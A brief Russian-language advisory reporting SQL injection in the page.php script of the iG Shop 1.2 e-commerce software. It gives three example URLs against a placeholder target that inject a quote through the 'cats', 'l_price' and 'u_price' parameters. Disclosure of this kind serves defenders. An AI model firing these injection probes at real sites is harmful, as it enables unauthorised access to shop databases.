Программа: iG Shop 1.2

Уязвимость позволяет удаленному
пользователю выполнить произвольные SQL
команды в базе данных уязвимого приложения.
Уязвимость существует в сценарии page.php из-за
некорректной фильтрации входных данных в
нескольких переменных. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольные
SQL команды.

Примеры:

http://[target]/page.php?page_type=catalog_products&type_id[]= 2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&
page_type=catalog_products&cats=’

http://[target]/page.php?page_type=catalog_products&type_id[]= 2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&
page_type3=catalog_products&search=1&l_price=’&u_price =1&Submit=Search

http://[target]/page.php?page_type=catalog_products&type_id[]= 2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&
page_type3=catalog_products&search=1&l_price=1&u_price =’&Submit=Search



Оставить мнение